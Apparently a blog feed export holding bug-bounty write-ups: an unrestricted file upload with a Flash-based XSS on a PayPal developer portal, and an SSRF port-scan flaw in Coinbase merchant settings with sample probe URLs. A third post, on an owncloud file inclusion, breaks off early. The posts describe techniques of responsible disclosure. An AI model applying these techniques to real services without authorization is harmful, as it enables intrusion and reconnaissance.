UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:12.0pt;
mso-para-margin-left:0in;
line-height:12.0pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Arial","sans-serif";
mso-ascii-font-family:Arial;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Arial;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
</style>
<![endif]--></div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-77677355177732282172013-09-25T02:54:00.005-07:002014-10-21T23:10:25.257-07:00Arbitrary File Upload in Paypal's http://apps.paypal.com<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<span style="font-family: Verdana, sans-serif;"><span style="orphans: 2; text-align: -webkit-auto; widows: 2;">This was one of many vulnerabilities that I had found in </span>http://apps.paypal.com as a part of their bug bounty program.<span style="orphans: 2; text-align: -webkit-auto; widows: 2;"> This is one of their developer portals which is hosted on Apache/2.2.22 and running Drupal 7. I reported this issue to Paypal on May 19 2013. </span></span><br />
<div style="orphans: 2; text-align: -webkit-auto; widows: 2;">
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><b>Here are some of the details of the bug:</b></span></div>
</div>
<div style="orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: Verdana, sans-serif;">After logging into the portal we can create applications suited to the developer environment and with this it allowed to upload supporting files (Ad Hoc files required for mobile app submissions). I uploaded a simple "txt" file and it generated an external link to the file (https://apps.paypal.com/system/files/test_###.txt).</span></div>
</div>
<div style="font-family: Tahoma; orphans: 2; text-align: -webkit-auto; widows: 2;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQsdDiEvJ7Gu1dg3hao-iq-dQr9l38lST8whxfVXA7U1oh1c1-r87SJHABQ16nI-EQEjtUkFo4RH8RgmXtx0IiklUJwxa4oSEO3l1fM1imiy8P0cEICNAjGCdkKfhYZbalH5Oqn4xo3VU/s1600/Test_txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQsdDiEvJ7Gu1dg3hao-iq-dQr9l38lST8whxfVXA7U1oh1c1-r87SJHABQ16nI-EQEjtUkFo4RH8RgmXtx0IiklUJwxa4oSEO3l1fM1imiy8P0cEICNAjGCdkKfhYZbalH5Oqn4xo3VU/s320/Test_txt.png" height="89" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="orphans: 2; text-align: -webkit-auto; widows: 2;">
<div>
<div style="text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">The upload allowed all type of extensions (*.jpg,*.txt,*.gzip,*.php,*.jar,*exe etc) and didn't validate the same on the server end. I tried uploading a simple php shell but sadly it didn't work :(.</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">I tried the "<b>XSS via SWF upload</b>" which was blogged by Soroush Dalili (<a href="http://soroush.secproject.com/blog/2012/11/xss-by-uploadingincluding-a-swf-file/" target="_blank">here </a>for more details). I uploaded the "xssproject.swf" file and got an external link (https://apps.paypal.com/system/files/xssproject.swf).</span></div>
</div>
<div style="font-family: Tahoma;">
<br /></div>
<div style="font-family: Tahoma;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitY5Fus3X1A07SXlB1JefPpBiCRwXk2Yzfh_RiUWxTpux9aYrYKt02M1uyW7WZXYwgffGL4vlxgJFPMZBTIAzsisSsvXCgvY9M33I6ygGSgZCoGHTPQR4dxA5bt_AwTIvKRxTjrvqeXmY/s1600/xssproject.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitY5Fus3X1A07SXlB1JefPpBiCRwXk2Yzfh_RiUWxTpux9aYrYKt02M1uyW7WZXYwgffGL4vlxgJFPMZBTIAzsisSsvXCgvY9M33I6ygGSgZCoGHTPQR4dxA5bt_AwTIvKRxTjrvqeXmY/s320/xssproject.png" height="221" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxHqiR8h2qc4GHYsEmjS8fjvi9l_Si8bsj1Er8-50UM-4ru7IvE5qY4vod6PwGyT4Qu-effywU_zE6r8TAivykMI45ZiScTvPj-6Q-RxdmhnX3T3KJ4AQK6s8hBTLoYwVL7oE8TYBtgfQ/s1600/XSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxHqiR8h2qc4GHYsEmjS8fjvi9l_Si8bsj1Er8-50UM-4ru7IvE5qY4vod6PwGyT4Qu-effywU_zE6r8TAivykMI45ZiScTvPj-6Q-RxdmhnX3T3KJ4AQK6s8hBTLoYwVL7oE8TYBtgfQ/s320/XSS.png" height="180" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Tahoma; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">The vulnerability was fixed immediately after it was reported to the security team.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Verdana, sans-serif;">Happy hunting!! cheers!!</span></div>
<div>
<br /></div>
</div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com1tag:blogger.com,1999:blog-1982130572676896150.post-42850616368019103662013-06-04T01:40:00.002-07:002014-10-21T23:11:03.830-07:00SSRF/XSPA Bug in https://www.coinbase.com<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">This was one of the bugs which i had reported to Coinbase.com on May 1 2013 as apart of their bug bounty program. Although I started quite late in hunting I was lucky enough to find one interesting vulnerability in their "Merchant_settings" portal. </span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">The vulnerability is an <a href="http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf" target="_blank">SSRF</a>/<a href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html" target="_blank">XSPA</a> which allows an attacker to use the application as a proxy to scan for other services on remote servers on the internet. So in layman terms this vulnerability can be abused to port scan other servers on the internet. </span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Here is the POC that I had submitted to coinbase. I used "scanme.nmap.org" which is known to have ports 22 and 80 opened.</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">In their "merchant_settings" they had a field wherein we can enter a URL for receiving instant payment notifications. And the field was not validated on the server end for any back-end response sent by the remote servers before displaying, this functionality allowed to do things like banner grabbing, port scanning, identify web-application frameworks etc.</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Here is an example of an open port (22) on "scanme.nmap.org" which fetched me the open-ssh version.</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">#http://scanme.nmap.org:22/index.html</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFAHNVjJ57mfschX3DEd4aEerm0ZhzctYihNUCg3IAPfimWwUirZmSCUzoziJ1HqstLJqfKzUUVynxcFSVO83aWn4iF8X-F3CqWLvdC8J1g9-phIJN-GlZhVNVNI7adKiJuswLuUIxYYE/s1600/open_port.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFAHNVjJ57mfschX3DEd4aEerm0ZhzctYihNUCg3IAPfimWwUirZmSCUzoziJ1HqstLJqfKzUUVynxcFSVO83aWn4iF8X-F3CqWLvdC8J1g9-phIJN-GlZhVNVNI7adKiJuswLuUIxYYE/s320/open_port.png" height="180" width="320" /></a></span></div>
<span style="font-family: Verdana,sans-serif;"><br /></span>
<br />
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><span style="font-size: small;">Here is what I received on entering a closed port (2243)</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><span style="font-size: small;">#http://scanme.nmap.org:2243/index.html</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaaZ0-eYKJiqCMRWuusPvX00u-IXJ0xUrFrZcuvQx31iWPvXKyU4kBpl6tjsUFGfZtqc1o752OscymAHwkYYkLVDUptamTQjyUUGOooZvbdEPeJmAJYrZ0tIUU0mfWWXGhP7RuGXyxekM/s1600/closedport.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaaZ0-eYKJiqCMRWuusPvX00u-IXJ0xUrFrZcuvQx31iWPvXKyU4kBpl6tjsUFGfZtqc1o752OscymAHwkYYkLVDUptamTQjyUUGOooZvbdEPeJmAJYrZ0tIUU0mfWWXGhP7RuGXyxekM/s320/closedport.png" height="180" width="320" /></a></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><br /></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><span style="font-size: small;">This functionality could have been abused in many ways one of them would be automating the attack and making multiple request to remote servers on well known ports. The Coinbase secuity team has already fixed this vulnerability but i was quite disappointed when i received a bounty which was lesser than the minimum bounty they had promised on their responsible disclosure page i.e a payout of 5BTC.</span></span></div>
<div style="color: black; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: Verdana,sans-serif;"><span style="font-size: small;">The security team responded saying "We can't be sure of how this vulnerability could affect our coinbase users, and we issue bounties for only those vulnerabilities which affect our userbase". Any ways I can't say I wasn't disappointed but yes they should have delivered what they had promised on their responsible disclosure <a href="https://coinbase.com/whitehat" target="_blank">page</a>.</span></span></div>
</div>
</div>
Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.com0tag:blogger.com,1999:blog-1982130572676896150.post-3141495527196173472013-03-20T05:24:00.000-07:002014-10-21T23:11:47.627-07:00Local File Inclusion Vulnerability in bugs.owncloud.org - CVE-2013-1761<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;"><br /></span></span></div>
<div style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; color: black; font-family: Tahoma; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-size: small;"><span style="font-family: Verdana,sans-serif;">Last year when i was finding vulnerabilities in owncloud.org i came across a Local file inclusion vulnerability in one of the subdomains of owncloud.org</span></span></div>
